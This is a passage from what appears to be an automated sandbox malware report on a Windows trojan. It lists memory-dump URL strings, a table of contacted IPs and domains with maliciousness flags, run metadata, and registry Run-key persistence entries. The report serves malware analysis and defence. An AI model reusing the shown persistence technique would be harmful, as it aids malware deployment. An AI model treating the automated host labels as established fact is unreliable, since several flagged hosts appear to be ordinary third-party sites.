00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://www.alteor.cl//nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      http://www.com-sit.com/wp-content/uploads/elementor/css/post-42.css?ver=1687848515nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        http://www.myropcb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542398710.0000000007C80000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692330028.0000000003970000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.577906109.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        http://www.com-sit.com/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=1.0.0nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                          http://www.abart.pl/.nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          http://www.ka-mo-me.com/enhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          http://www.nqks.com/m/o%nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                          217.69.139.150
                                                                                                                                                                                                                                                                          mxs.mail.ruRussian Federation
                                                                                                                                                                                                                                                                          47764MAILRU-ASMailRuRUtrue
                                                                                                                                                                                                                                                                          198.49.23.145
                                                                                                                                                                                                                                                                          refintl.orgUnited States
                                                                                                                                                                                                                                                                          53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                          76.74.184.61
                                                                                                                                                                                                                                                                          alexpope.bizCanada
                                                                                                                                                                                                                                                                          13768COGECO-PEER1CAfalse
                                                                                                                                                                                                                                                                          107.180.58.31
                                                                                                                                                                                                                                                                          orbitgas.comUnited States
                                                                                                                                                                                                                                                                          26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                                          172.67.152.159
                                                                                                                                                                                                                                                                          www.tvtools.fiUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          104.20.55.214
                                                                                                                                                                                                                                                                          bible.orgUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          153.126.211.112
                                                                                                                                                                                                                                                                          mikihan.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                          217.160.0.131
                                                                                                                                                                                                                                                                          mackusick.deGermany
                                                                                                                                                                                                                                                                          8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                                                                                                                                                                                          3.130.204.160
                                                                                                                                                                                                                                                                          hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                          5.189.171.125
                                                                                                                                                                                                                                                                          muhr-soehne.deGermany
                                                                                                                                                                                                                                                                          51167CONTABODEfalse
                                                                                                                                                                                                                                                                          198.49.23.144
                                                                                                                                                                                                                                                                          mijash3.comUnited States
                                                                                                                                                                                                                                                                          53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                          49.212.243.77
                                                                                                                                                                                                                                                                          listel.co.jpJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                          83.223.113.46
                                                                                                                                                                                                                                                                          dataform.co.ukUnited Kingdom
                                                                                                                                                                                                                                                                          29017GYRONGBfalse
                                                                                                                                                                                                                                                                          91.229.22.126
                                                                                                                                                                                                                                                                          pleszew.policja.gov.plPoland
                                                                                                                                                                                                                                                                          198704CSD-KGP-PL-ASBiuroLacznosciiInformatykiPLtrue
                                                                                                                                                                                                                                                                          5.39.75.157
                                                                                                                                                                                                                                                                          bosado.comFrance
                                                                                                                                                                                                                                                                          16276OVHFRtrue
                                                                                                                                                                                                                                                                          69.195.90.46
                                                                                                                                                                                                                                                                          rtcasey.comUnited States
                                                                                                                                                                                                                                                                          46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                                                                                          83.167.255.150
                                                                                                                                                                                                                                                                          dzm.czCzech Republic
                                                                                                                                                                                                                                                                          24971MASTER-ASCzechRepublicwwwmasterczCZtrue
                                                                                                                                                                                                                                                                          66.226.70.66
                                                                                                                                                                                                                                                                          mail.airmail.netUnited States
                                                                                                                                                                                                                                                                          30447INFB2-ASUSfalse
                                                                                                                                                                                                                                                                          13.248.169.48
                                                                                                                                                                                                                                                                          www.findbc.comUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                          85.128.196.22
                                                                                                                                                                                                                                                                          strazynski.plPoland
                                                                                                                                                                                                                                                                          15967NAZWAPLtrue
                                                                                                                                                                                                                                                                          202.254.236.40
                                                                                                                                                                                                                                                                          www.naoi-a.comJapan9371SAKURA-CSAKURAInternetIncJPfalse
                                                                                                                                                                                                                                                                          173.194.202.26
                                                                                                                                                                                                                                                                          alt4.gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                          81.2.194.241
                                                                                                                                                                                                                                                                          www.edimart.huCzech Republic
                                                                                                                                                                                                                                                                          24806INTERNET-CZKtis238403KtisCZfalse
                                                                                                                                                                                                                                                                          37.59.243.164
                                                                                                                                                                                                                                                                          aluminox.esFrance
                                                                                                                                                                                                                                                                          16276OVHFRtrue
                                                                                                                                                                                                                                                                          217.19.254.22
                                                                                                                                                                                                                                                                          shanks.co.ukUnited Kingdom
                                                                                                                                                                                                                                                                          60819SAFENAMES-ASGBtrue
                                                                                                                                                                                                                                                                          35.186.238.101
                                                                                                                                                                                                                                                                          onzcda.comUnited States
                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                          185.163.45.187
                                                                                                                                                                                                                                                                          softizer.comMoldova Republic of
                                                                                                                                                                                                                                                                          39798MIVOCLOUDMDtrue
                                                                                                                                                                                                                                                                          216.177.137.32
                                                                                                                                                                                                                                                                          fortknox.bmUnited States
                                                                                                                                                                                                                                                                          3955321P-WSSUSfalse
                                                                                                                                                                                                                                                                          93.189.66.202
                                                                                                                                                                                                                                                                          ssm.chSwitzerland
                                                                                                                                                                                                                                                                          12347VIRTUALTECCHtrue
                                                                                                                                                                                                                                                                          219.94.129.97
                                                                                                                                                                                                                                                                          web-york.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                          74.208.215.145
                                                                                                                                                                                                                                                                          indonesiamedia.comUnited States
                                                                                                                                                                                                                                                                          8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                                                                                          52.204.111.188
                                                                                                                                                                                                                                                                          cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                          104.26.10.81
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          46.30.60.158
                                                                                                                                                                                                                                                                          ncn.deGermany
                                                                                                                                                                                                                                                                          15817MITTWALD-ASMittwaldCMServiceGmbHundCoKGDEfalse
                                                                                                                                                                                                                                                                          104.21.23.9
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          77.78.104.3
                                                                                                                                                                                                                                                                          zupraha.czCzech Republic
                                                                                                                                                                                                                                                                          15685CASABLANCA-ASInternetCollocationProviderCZfalse
                                                                                                                                                                                                                                                                          192.99.226.184
                                                                                                                                                                                                                                                                          s5w.comCanada
                                                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                                                          88.86.118.82
                                                                                                                                                                                                                                                                          deckoviny.czCzech Republic
                                                                                                                                                                                                                                                                          39392SUPERNETWORK_CZtrue
                                                                                                                                                                                                                                                                          195.78.66.50
                                                                                                                                                                                                                                                                          www.photo4b.comPoland
                                                                                                                                                                                                                                                                          41079SUPERHOST-PL-ASPLfalse
                                                                                                                                                                                                                                                                          137.118.26.67
                                                                                                                                                                                                                                                                          fnw.usUnited States
                                                                                                                                                                                                                                                                          6250NEONOVA-NETUSfalse
                                                                                                                                                                                                                                                                          188.166.152.188
                                                                                                                                                                                                                                                                          www.c9dd.comNetherlands
                                                                                                                                                                                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                          104.26.0.82
                                                                                                                                                                                                                                                                          top1oil.comUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          185.253.212.22
                                                                                                                                                                                                                                                                          karmy.com.plPoland
                                                                                                                                                                                                                                                                          48707GREENER-ASPLfalse
                                                                                                                                                                                                                                                                          104.26.13.244
                                                                                                                                                                                                                                                                          scip.org.ukUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          210.140.73.39
                                                                                                                                                                                                                                                                          at-shun.comJapan4694IDCFIDCFrontierIncJPtrue
                                                                                                                                                                                                                                                                          70.39.251.249
                                                                                                                                                                                                                                                                          quadlock.comUnited States
                                                                                                                                                                                                                                                                          54641INMOTI-1USfalse
                                                                                                                                                                                                                                                                          104.26.7.221
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          62.75.216.137
                                                                                                                                                                                                                                                                          www.tyrns.comGermany
                                                                                                                                                                                                                                                                          8972GD-EMEA-DC-SXB1DEfalse
                                                                                                                                                                                                                                                                          62.122.170.171
                                                                                                                                                                                                                                                                          shztm.ruCzech Republic
                                                                                                                                                                                                                                                                          50245SERVEREL-ASNLfalse
                                                                                                                                                                                                                                                                          72.251.233.245
                                                                                                                                                                                                                                                                          www.koz1.netUnited States
                                                                                                                                                                                                                                                                          29791VOXEL-DOT-NETUStrue
                                                                                                                                                                                                                                                                          13.224.103.91
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                          208.100.26.245
                                                                                                                                                                                                                                                                          atb-lit.comUnited States
                                                                                                                                                                                                                                                                          32748STEADFASTUStrue
                                                                                                                                                                                                                                                                          51.159.3.117
                                                                                                                                                                                                                                                                          ossir.orgFrance
                                                                                                                                                                                                                                                                          12876OnlineSASFRtrue
                                                                                                                                                                                                                                                                          82.201.61.230
                                                                                                                                                                                                                                                                          www.nelipak.nlNetherlands
                                                                                                                                                                                                                                                                          15879KPN-INTERNEDSERVICESNLfalse
                                                                                                                                                                                                                                                                          79.124.76.247
                                                                                                                                                                                                                                                                          mkm-gr.comBulgaria
                                                                                                                                                                                                                                                                          31083TELEPOINTBGtrue
                                                                                                                                                                                                                                                                          192.124.249.3
                                                                                                                                                                                                                                                                          pers.comUnited States
                                                                                                                                                                                                                                                                          30148SUCURI-SECUStrue
                                                                                                                                                                                                                                                                          208.80.123.195
                                                                                                                                                                                                                                                                          gbp-jp.comUnited States
                                                                                                                                                                                                                                                                          16552TIGGEEUStrue
                                                                                                                                                                                                                                                                          46.19.218.80
                                                                                                                                                                                                                                                                          mcseurope.nlNetherlands
                                                                                                                                                                                                                                                                          20559FUNDAMENTS-ASNLtrue
                                                                                                                                                                                                                                                                          34.102.136.180
                                                                                                                                                                                                                                                                          hamaker.netUnited States
                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                          52.71.57.184
                                                                                                                                                                                                                                                                          hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                          192.241.158.94
                                                                                                                                                                                                                                                                          nunomira.comUnited States
                                                                                                                                                                                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                          172.67.164.178
                                                                                                                                                                                                                                                                          clinicasanluis.com.coUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                          63.251.106.25
                                                                                                                                                                                                                                                                          kewlmail.comUnited States
                                                                                                                                                                                                                                                                          29791VOXEL-DOT-NETUStrue
                                                                                                                                                                                                                                                                          195.96.252.188
                                                                                                                                                                                                                                                                          nlcv.bas.bgBulgaria
                                                                                                                                                                                                                                                                          8745AS-BG-BASBGtrue
                                                                                                                                                                                                                                                                          212.44.102.57
                                                                                                                                                                                                                                                                          oozkranj.comSlovenia
                                                                                                                                                                                                                                                                          43128DHH-ASSItrue
                                                                                                                                                                                                                                                                          108.156.2.73
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                          35.74.157.89
                                                                                                                                                                                                                                                                          k-nikko.comUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                          108.177.126.27
                                                                                                                                                                                                                                                                          gmail-smtp-in.l.google.comUnited States
                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                          172.217.16.179
                                                                                                                                                                                                                                                                          ghs.googlehosted.comUnited States
                                                                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                          164.132.175.106
                                                                                                                                                                                                                                                                          zemarmot.netFrance
                                                                                                                                                                                                                                                                          16276OVHFRtrue
                                                                                                                                                                                                                                                                          85.233.160.146
                                                                                                                                                                                                                                                                          hbfuels.comUnited Kingdom
                                                                                                                                                                                                                                                                          8622ISIONUKNamescoLimitedGBfalse
                                                                                                                                                                                                                                                                          165.227.252.190
                                                                                                                                                                                                                                                                          crcsi.orgUnited States
                                                                                                                                                                                                                                                                          14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                          199.34.228.78
                                                                                                                                                                                                                                                                          ftmobile.comUnited States
                                                                                                                                                                                                                                                                          27647WEEBLYUSfalse
                                                                                                                                                                                                                                                                          103.168.172.217
                                                                                                                                                                                                                                                                          unknownunknown
                                                                                                                                                                                                                                                                          7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNetrue
                                                                                                                                                                                                                                                                          103.168.172.216
                                                                                                                                                                                                                                                                          in1.smtp.messaginguser.comunknown
                                                                                                                                                                                                                                                                          7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                                                                                                                                                                                                                                                          198.185.159.144
                                                                                                                                                                                                                                                                          captlfix.comUnited States
                                                                                                                                                                                                                                                                          53831SQUARESPACEUStrue
                                                                                                                                                                                                                                                                          211.13.196.162
                                                                                                                                                                                                                                                                          unknownJapan7514MEXComputerEngineeringConsultingLtdJPtrue
                                                                                                                                                                                                                                                                          35.172.94.1
                                                                                                                                                                                                                                                                          themark.orgUnited States
                                                                                                                                                                                                                                                                          14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                          195.128.140.29
                                                                                                                                                                                                                                                                          nettle.plPoland
                                                                                                                                                                                                                                                                          56590RBO-NETPLtrue
                                                                                                                                                                                                                                                                          76.223.35.103
                                                                                                                                                                                                                                                                          nrsi.comUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                          92.204.129.113
                                                                                                                                                                                                                                                                          lpver.comGermany
                                                                                                                                                                                                                                                                          398108GO-DADDY-COM-LLCUStrue
                                                                                                                                                                                                                                                                          69.163.239.62
                                                                                                                                                                                                                                                                          sjbs.orgUnited States
                                                                                                                                                                                                                                                                          26347DREAMHOST-ASUSfalse
                                                                                                                                                                                                                                                                          104.26.3.124
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                          38.111.255.201
                                                                                                                                                                                                                                                                          wnit.orgUnited States
                                                                                                                                                                                                                                                                          62550INOVADATAUStrue
                                                                                                                                                                                                                                                                          66.94.119.160
                                                                                                                                                                                                                                                                          www.yocinc.orgUnited States
                                                                                                                                                                                                                                                                          394513AWESOMENET-CORPUSfalse
                                                                                                                                                                                                                                                                          204.11.56.48
                                                                                                                                                                                                                                                                          impexnc.comVirgin Islands (BRITISH)
                                                                                                                                                                                                                                                                          40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                                                                                          154.203.14.100
                                                                                                                                                                                                                                                                          www.mobilnic.netSeychelles
                                                                                                                                                                                                                                                                          135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                                                                                                                                                                                                                                                                          108.167.164.216
                                                                                                                                                                                                                                                                          aevga.comUnited States
                                                                                                                                                                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                                                          5.196.166.214
                                                                                                                                                                                                                                                                          www.spanesi.comFrance
                                                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                                                          185.76.64.25
                                                                                                                                                                                                                                                                          kallman.netSweden
                                                                                                                                                                                                                                                                          200719MISSDOMAINSEfalse
                                                                                                                                                                                                                                                                          47.91.167.60
                                                                                                                                                                                                                                                                          popbook.comUnited States
                                                                                                                                                                                                                                                                          45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                                                                                                          3.212.23.181
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                          64.125.133.18
                                                                                                                                                                                                                                                                          reglera.comUnited States
                                                                                                                                                                                                                                                                          393631DLSS-CA-EMERYVILLE-ASUSfalse
                                                                                                                                                                                                                                                                          213.186.33.17
                                                                                                                                                                                                                                                                          item-pr.comFrance
                                                                                                                                                                                                                                                                          16276OVHFRfalse
                                                                                                                                                                                                                                                                          219.94.128.87
                                                                                                                                                                                                                                                                          angework.comJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                                                                                                                                                                                                                                          93.187.206.66
                                                                                                                                                                                                                                                                          www.yoruksut.comTurkey
                                                                                                                                                                                                                                                                          43391NETDIREKT-ASTRtrue
                                                                                                                                                                                                                                                                          82.208.6.9
                                                                                                                                                                                                                                                                          insia.comCzech Republic
                                                                                                                                                                                                                                                                          15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                                                                                                                                                                                                                                                          87.230.93.218
                                                                                                                                                                                                                                                                          dwid.deGermany
                                                                                                                                                                                                                                                                          8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                                                                          67.195.12.38
                                                                                                                                                                                                                                                                          smtp1.sbc.mail.am0.yahoodns.netUnited States
                                                                                                                                                                                                                                                                          36647YAHOO-GQ1USfalse
                                                                                                                                                                                                                                                                          13.224.103.24
                                                                                                                                                                                                                                                                          unknownUnited States
                                                                                                                                                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                          Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                                                                                                                                          Analysis ID:1266961
                                                                                                                                                                                                                                                                          Start date and time:2023-07-05 08:04:31 +02:00
                                                                                                                                                                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                                                          Overall analysis duration:0h 14m 53s
                                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:12
                                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                                          • HDC enabled
                                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                          Sample file name:nhVJ8J5qOt.exe
                                                                                                                                                                                                                                                                          Original Sample Name:2cca5c1b1f00170bd750694d9511015b.exe
                                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                                          Classification:mal100.spre.troj.evad.winEXE@19/4@2269/100
                                                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                                                          HDC Information:
                                                                                                                                                                                                                                                                          • Successful, ratio: 85.1% (good quality ratio 78.7%)
                                                                                                                                                                                                                                                                          • Quality average: 75.5%
                                                                                                                                                                                                                                                                          • Quality standard deviation: 30.8%
                                                                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                                                                          • Number of executed functions: 126
                                                                                                                                                                                                                                                                          • Number of non-executed functions: 111
                                                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 104.21.63.28, 172.67.142.169, 204.79.197.212
                                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): www.ottospm.com.cdn.cloudflare.net, a-0010.a-msedge.net
                                                                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                                                          08:05:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                          08:05:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run pigalicapi C:\Users\user\pigalicapi.exe
